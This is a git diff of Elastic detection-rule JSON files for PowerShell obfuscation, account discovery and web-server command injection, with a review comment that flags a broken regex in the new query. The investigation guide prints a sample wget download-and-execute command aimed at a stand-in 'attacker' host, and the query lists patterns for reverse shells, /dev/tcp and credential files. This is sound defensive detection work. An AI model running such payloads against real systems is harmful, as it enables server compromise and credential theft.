Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1570", - "name": "Lateral Tool Transfer", - "reference": "https://attack.mitre.org/techniques/T1570/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 3 - }, - "id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46_3", - "type": "security-rule" -} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_7.json b/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_7.json
deleted file mode 100644
index be5cacaed25..00000000000
--- a/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_7.json
+++ /dev/null
@@ -1,163 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use reversed strings as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Reverse Keywords", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Reverse Keywords\n\nPowerShell, a powerful scripting language in Windows environments, is often targeted by adversaries for obfuscation to bypass security measures like AMSI. Attackers reverse keywords in scripts to evade static analysis. The detection rule identifies such obfuscation by searching for reversed keywords, replacing them with a unique marker, and counting occurrences. This helps in flagging scripts with multiple obfuscated elements, indicating potential malicious activity.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the context and content of the script that triggered the alert. Look for any suspicious or unexpected behavior in the script logic.\n- Examine the `file.path` field to determine the location of the script on the system. This can provide insights into whether the script is part of a legitimate application or potentially malicious.\n- Check the `powershell.file.script_block_id` and `powershell.sequence` fields to identify if the script is part of a larger sequence of commands. 
This can help in understanding the full scope of the script's execution.\n- Investigate the `agent.id` field to identify the specific endpoint where the script was executed. This can help in correlating with other alerts or logs from the same machine.\n- Assess the `count` field to determine the extent of obfuscation. A higher count may indicate a more heavily obfuscated script, suggesting a higher likelihood of malicious intent.\n\n### False positive analysis\n\n- Scripts with legitimate administrative functions may use reversed keywords for benign purposes, such as custom logging or debugging. Review the context of the script to determine if the usage is intentional and non-malicious.\n- Automated scripts generated by legitimate software tools might include reversed keywords as part of their normal operation. Identify these tools and create exceptions for their known script patterns to prevent unnecessary alerts.\n- Developers or IT personnel might use reversed keywords in test environments to simulate obfuscation techniques. Ensure these environments are well-documented and excluded from production monitoring to avoid false positives.\n- PowerShell scripts used in educational or training settings may intentionally include obfuscation techniques for learning purposes. 
Exclude these scripts by identifying their unique characteristics or file paths.\n- Regularly update the list of excluded scripts or patterns as new legitimate use cases are identified, ensuring the detection rule remains effective without generating excessive false positives.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing malicious activity.\n- Conduct a thorough review of the script block text and associated files to understand the scope and intent of the obfuscation.\n- Remove or quarantine any identified malicious scripts or files from the system to prevent re-execution.\n- Restore affected systems from a known good backup if malicious activity has altered system integrity.\n- Update endpoint protection and security tools to recognize and block similar obfuscation techniques in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and monitoring of potential lateral movement or additional threats.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter for scripts that contains these keywords using MATCH, boosts the query performance,\n// match will ignore the | and look for the individual words\n| where powershell.file.script_block_text : \"rahc|metsys|stekcos|tcejboimw|ecalper|ecnerferpe|noitcennoc|nioj|eman|vne|gnirts|tcejbo-wen|_23niw|noisserpxe|ekovni|daolnwod\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n 
\"\"\"(?i)(rahc|metsys|stekcos|tcejboimw|ecalper|ecnerferpe|noitcennoc|nioj|eman\\.|:vne$|gnirts|tcejbo-wen|_23niw|noisserpxe|ekovni|daolnwod)\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n agent.id\n\n// Filter for scripts that match the pattern at least twice\n| where Esql.script_block_pattern_count >= 2\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - 
"ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - } - ], - "risk_score": 21, - "rule_id": "f38633f4-3b31-4c80-b13d-e77c70ce8254", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": 
"event.ingested", - "type": "esql", - "version": 7 - }, - "id": "f38633f4-3b31-4c80-b13d-e77c70ce8254_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3.json b/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3.json new file mode 100644 index 00000000000..3b70013cdbc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3.json 
@@ -0,0 +1,265 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Potential Command Injection Request", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Potential Command Injection Request\n\nThis rule flags web requests whose URLs embed command-execution payloads\u2014interpreter flags, shell invocations, netcat reverse shells, /dev/tcp, base64, credential file paths, downloaders, and suspicious temp or cron paths. It matters because attackers use low-volume, successful (200) requests to trigger server-side command injection and gain persistence or control without obvious errors. 
Example: a crafted query executes bash -c 'wget http://attacker/rev.sh -O /tmp/r; chmod +x /tmp/r; /tmp/r' from the web app, yielding a 200 while dropping and running a payload.\n\n### Possible investigation steps\n\n- Pull the raw HTTP request or PCAP, repeatedly URL-decode and base64-decode parameters, and extract shell metacharacters, commands, IP:port pairs, file paths, and download URLs to infer execution intent.\n- Time-correlate the request with host telemetry for web-server-owned child processes, file writes in /tmp, /dev/shm, or web roots, cron modifications, and new outbound connections from the same host.\n- Pivot on the source IP and user-agent to find related requests across other hosts/endpoints, identify scan-to-exploit sequencing and success patterns, and enact blocking or rate limiting if malicious.\n- Map the targeted route to its backend handler and review code/config to see if user input reaches exec/system/os.popen, templating/deserialization, or shell invocations, then safely reproduce in staging to validate exploitability.\n- If the payload references external indicators, search DNS/proxy/firewall telemetry for matching egress, retrieve and analyze any downloaded artifacts, and hunt for the same indicators across the fleet.\n\n### False positive analysis\n\n- A documentation or code-rendering page that echoes command-like strings from query parameters (e.g., \"bash -c\", \"python -c\", \"curl\", \"/etc/passwd\") returns 200 while merely displaying text, so the URL contains payload keywords without any execution.\n- A low-volume developer or QA test to a sandbox route includes path or query values like \"/dev/tcp/\", \"nc 10.0.0.1 4444\", \"busybox\", or \"chmod +x\" to validate input handling, the server returns 200 and the rule triggers despite no server-side execution path consuming those parameters.\n\n### Response and remediation\n\n- Block the offending source IPs and User-Agents at the WAF/reverse proxy, add virtual patches to drop URLs 
containing 'bash -c', '/dev/tcp', 'base64 -d', 'curl' or 'nc', and remove the targeted route from the load balancer until verified safe.\n- Isolate the impacted host from the network (at minimum egress) if the web service spawns child processes like bash/sh/python -c, creates files in /tmp or /dev/shm, modifies /etc/cron.*, or opens outbound connections to an IP:port embedded in the request.\n- Acquire volatile memory and preserve access/error logs and any downloaded script before cleanup, then terminate malicious child processes owned by nginx/httpd/tomcat/w3wp, delete dropped artifacts (e.g., /tmp/*, /dev/shm/*, suspicious files in the webroot), and revert cron/systemd or SSH key changes.\n- Rotate credentials and tokens if /etc/passwd, /etc/shadow, or ~/.ssh paths were targeted, rebuild the host or container from a known-good image, patch the application and dependencies, and validate clean startup with outbound traffic restricted to approved destinations.\n- Immediately escalate to the incident commander and legal/privacy if remote command execution is confirmed (evidence: web-server-owned 'bash -c' or 'python -c' executed, curl/wget download-and-execute, or reverse shell to an external IP:port) or if sensitive data exposure is suspected.\n- Harden by enforcing strict input validation, disabling shell/exec functions in the runtime (e.g., PHP disable_functions and no shell-outs in templates), running under least privilege with noexec,nodev /tmp and a read-only webroot, restricting egress by policy, and deploying WAF rules and host sensors to detect these strings and cron/webshell creation.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n| where\n // Limit to 200 response code to reduce noise\n http.response.status_code == 200\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| eval Esql.contains_interpreter = case(Esql.url_original_to_lower like \"*python* -c*\" 
or Esql.url_original_to_lower like \"*perl* -e*\" or Esql.url_original_to_lower like \"*ruby* -e*\" or Esql.url_original_to_lower like \"*ruby* -rsocket*\" or Esql.url_original_to_lower like \"*lua* -e*\" or Esql.url_original_to_lower like \"*php* -r*\" or Esql.url_original_to_lower like \"*node* -e*\", 1, 0)\n| eval Esql.contains_shell = case(Esql.url_original_to_lower like \"*/bin/bash*\" or Esql.url_original_to_lower like \"*bash*-c*\" or Esql.url_original_to_lower like \"*/bin/sh*\" or Esql.url_original_to_lower rlike \"*sh.{1,2}-c*\", 1, 0)\n| eval Esql.contains_nc = case(Esql.url_original_to_lower like \"*netcat*\" or Esql.url_original_to_lower like \"*ncat*\" or Esql.url_original_to_lower rlike \"\"\".*nc.{1,2}[0-9]{1,3}(\\.[0-9]{1,3}){3}.{1,2}[0-9]{1,5}.*\"\"\" or Esql.url_original_to_lower like \"*nc.openbsd*\" or Esql.url_original_to_lower like \"*nc.traditional*\" or Esql.url_original_to_lower like \"*socat*\", 1, 0)\n| eval Esql.contains_devtcp = case(Esql.url_original_to_lower like \"*/dev/tcp/*\" or Esql.url_original_to_lower like \"*/dev/udp/*\", 1, 0)\n| eval Esql.contains_helpers = case((Esql.url_original_to_lower like \"*/bin/*\" or Esql.url_original_to_lower like \"*/usr/bin/*\") and (Esql.url_original_to_lower like \"*mkfifo*\" or Esql.url_original_to_lower like \"*nohup*\" or Esql.url_original_to_lower like \"*setsid*\" or Esql.url_original_to_lower like \"*busybox*\"), 1, 0)\n| eval Esql.contains_sus_cli = case(Esql.url_original_to_lower like \"*import*pty*spawn*\" or Esql.url_original_to_lower like \"*import*subprocess*call*\" or Esql.url_original_to_lower like \"*tcpsocket.new*\" or Esql.url_original_to_lower like \"*tcpsocket.open*\" or Esql.url_original_to_lower like \"*io.popen*\" or Esql.url_original_to_lower like \"*os.execute*\" or Esql.url_original_to_lower like \"*fsockopen*\", 1, 0)\n| eval Esql.contains_privileges = case(Esql.url_original_to_lower like \"*chmod*+x\", 1, 0)\n| eval Esql.contains_downloader = 
case(Esql.url_original_to_lower like \"*curl *\" or Esql.url_original_to_lower like \"*wget *\" , 1, 0)\n| eval Esql.contains_file_read_keywords = case(Esql.url_original_to_lower like \"*/etc/shadow*\" or Esql.url_original_to_lower like \"*/etc/passwd*\" or Esql.url_original_to_lower like \"*/root/.ssh/*\" or Esql.url_original_to_lower like \"*/home/*/.ssh/*\" or Esql.url_original_to_lower like \"*~/.ssh/*\" or Esql.url_original_to_lower like \"*/proc/self/environ*\", 1, 0)\n| eval Esql.contains_base64_cmd = case(Esql.url_original_to_lower like \"*base64*-d*\" or Esql.url_original_to_lower like \"*echo*|*base64*\", 1, 0)\n| eval Esql.contains_suspicious_path = case(Esql.url_original_to_lower like \"*/tmp/*\" or Esql.url_original_to_lower like \"*/var/tmp/*\" or Esql.url_original_to_lower like \"*/dev/shm/*\" or Esql.url_original_to_lower like \"*/root/*\" or Esql.url_original_to_lower like \"*/home/*/*\" or Esql.url_original_to_lower like \"*/var/www/*\" or Esql.url_original_to_lower like \"*/etc/cron.*/*\", 1, 0)\n\n| eval Esql.any_payload_keyword = case(\n Esql.contains_interpreter == 1 or Esql.contains_shell == 1 or Esql.contains_nc == 1 or Esql.contains_devtcp == 1 or\n Esql.contains_helpers == 1 or Esql.contains_sus_cli == 1 or Esql.contains_privileges == 1 or Esql.contains_downloader == 1 or\n Esql.contains_file_read_keywords == 1 or Esql.contains_base64_cmd == 1 or Esql.contains_suspicious_path == 1, 1, 0)\n\n| keep\n @timestamp,\n Esql.url_original_to_lower,\n Esql.any_payload_keyword,\n Esql.contains_interpreter,\n Esql.contains_shell,\n Esql.contains_nc,\n Esql.contains_devtcp,\n Esql.contains_helpers,\n Esql.contains_sus_cli,\n Esql.contains_privileges,\n Esql.contains_downloader,\n Esql.contains_file_read_keywords,\n Esql.contains_base64_cmd,\n Esql.contains_suspicious_path,\n source.ip,\n destination.ip,\n agent.id,\n http.request.method,\n http.response.status_code,\n user_agent.original,\n agent.name,\n event.dataset,\n data_stream.namespace\n\n| 
stats\n Esql.event_count = count(),\n Esql.url_path_count_distinct = count_distinct(Esql.url_original_to_lower),\n\n // General fields\n\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.url_path_values = values(Esql.url_original_to_lower),\n Esql.http.response.status_code_values = values(http.response.status_code),\n Esql.user_agent_original_values = values(user_agent.original),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace),\n\n // Rule Specific fields\n Esql.any_payload_keyword_max = max(Esql.any_payload_keyword),\n Esql.contains_interpreter_values = values(Esql.contains_interpreter),\n Esql.contains_shell_values = values(Esql.contains_shell),\n Esql.contains_nc_values = values(Esql.contains_nc),\n Esql.contains_devtcp_values = values(Esql.contains_devtcp),\n Esql.contains_helpers_values = values(Esql.contains_helpers),\n Esql.contains_sus_cli_values = values(Esql.contains_sus_cli),\n Esql.contains_privileges_values = values(Esql.contains_privileges),\n Esql.contains_downloader_values = values(Esql.contains_downloader),\n Esql.contains_file_read_keywords_values = values(Esql.contains_file_read_keywords),\n Esql.contains_base64_cmd_values = values(Esql.contains_base64_cmd),\n Esql.contains_suspicious_path_values = values(Esql.contains_suspicious_path)\n\n by source.ip, agent.id\n\n| where\n // Filter for potential command injection attempts with low event counts to reduce false positives\n Esql.any_payload_keyword_max == 1 and Esql.event_count < 5\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": 
"keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.any_payload_keyword_max", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_base64_cmd_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_devtcp_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_downloader_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_file_read_keywords_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_helpers_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_interpreter_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_nc_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_privileges_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_shell_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_sus_cli_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_suspicious_path_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http.response.status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "f3ac6734-7e52-4a0d-90b7-6847bf4308f2", + "severity": "low", + "tags": [ + 
"Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": 
"https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4.json deleted file mode 100644 index e7f7ba03082..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4.json +++ /dev/null 
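Review bot: The `Esql.contains_shell` branch of the new query uses `rlike "*sh.{1,2}-c*"`, but `rlike` takes a regular expression, where a leading `*` is not a wildcard — the `Esql.contains_nc` branch in the same query correctly writes `.*`, so this should read `rlike ".*sh.{1,2}-c.*"` to be consistent and to actually fire on the `sh -c` forms it targets (as written it either never matches or fails to compile, depending on the regex engine). The `Esql.contains_privileges` pattern `like "*chmod*+x"` has no trailing wildcard, so it only matches when `+x` are the final characters of `url.original`; `like "*chmod*+x*"` is likely what was intended. The rule matches on `to_lower(url.original)` without any decoding step, so the space-containing patterns such as `"*curl *"`, `"*wget *"` and `"*python* -c*"` will probably miss requests whose spaces arrive URL-encoded as `%20` or `+` — worth stating in the rule's note, or adding the encoded forms (e.g. `"*curl%20*"`) alongside, since the investigation guide itself assumes repeated URL-decoding is needed. The broad path indicators `"*/home/*/*"` and `"*/var/www/*"` will match many benign URLs, which makes the `risk_score` of 21 / `severity` low appropriate but is worth calling out in the false-positive section.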
@@ -1,118 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Adversaries may use built-in applications to get a listing of local system or domain accounts and groups.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "Account or Group Discovery via Built-In Tools", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and ( \n (process.name in (\"groups\", \"id\")) or \n (process.name == \"dscl\" and process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\")) or\n (process.name == \"dscacheutil\" and process.args in (\"user\", \"group\")) or\n (process.args in (\"/etc/passwd\", \"/etc/master.passwd\", \"/etc/sudoers\")) or\n (process.name == \"getent\" and process.args in (\"passwd\", \"group\"))\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "auditd_manager", - "version": "^1.18.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - 
"technique": [ - { - "id": "T1069", - "name": "Permission Groups Discovery", - "reference": "https://attack.mitre.org/techniques/T1069/", - "subtechnique": [ - { - "id": "T1069.001", - "name": "Local Groups", - "reference": "https://attack.mitre.org/techniques/T1069/001/" - }, - { - "id": "T1069.002", - "name": "Domain Groups", - "reference": "https://attack.mitre.org/techniques/T1069/002/" - } - ] - }, - { - "id": "T1087", - "name": "Account Discovery", - "reference": "https://attack.mitre.org/techniques/T1087/", - "subtechnique": [ - { - "id": "T1087.001", - "name": "Local Account", - "reference": "https://attack.mitre.org/techniques/T1087/001/" - }, - { - "id": "T1087.002", - "name": "Domain Account", - "reference": "https://attack.mitre.org/techniques/T1087/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 - }, - "id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_7.json b/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_7.json deleted file mode 100644 index c65d85434fb..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_7.json +++ /dev/null 
@@ -1,178 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use string concatenation as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via String Concatenation", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via String Concatenation\n\nPowerShell is a powerful scripting language used for task automation and configuration management. Adversaries exploit its flexibility to obfuscate malicious scripts, often using string concatenation to evade detection. 
The detection rule identifies scripts with excessive concatenation patterns, flagging potential obfuscation by analyzing script length and pattern frequency, thus aiding in uncovering hidden threats.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and purpose of the script, focusing on the sections identified by the string concatenation patterns.\n- Examine the file.path field to determine the location of the script on the host system, which can provide context about its origin and potential legitimacy.\n- Check the host.name and agent.id fields to identify the affected system and correlate with other security events or alerts from the same host for broader context.\n- Investigate the user.id field to determine which user executed the script, assessing their role and whether they have a legitimate reason to run such scripts.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution flow and sequence of the script blocks, which may reveal additional obfuscation or malicious behavior.\n- Cross-reference the _id and _index fields with other logs or alerts to identify any related incidents or patterns of activity that might indicate a larger threat campaign.\n\n### False positive analysis\n\n- Scripts with legitimate string concatenation for logging or configuration purposes may trigger the rule. Review the script context to determine if the concatenation is part of a benign operation.\n- Automated scripts generated by development tools might use string concatenation extensively. Identify these tools and consider excluding their output directories or specific script patterns from the rule.\n- PowerShell scripts used in complex data processing tasks may naturally contain high levels of string concatenation. 
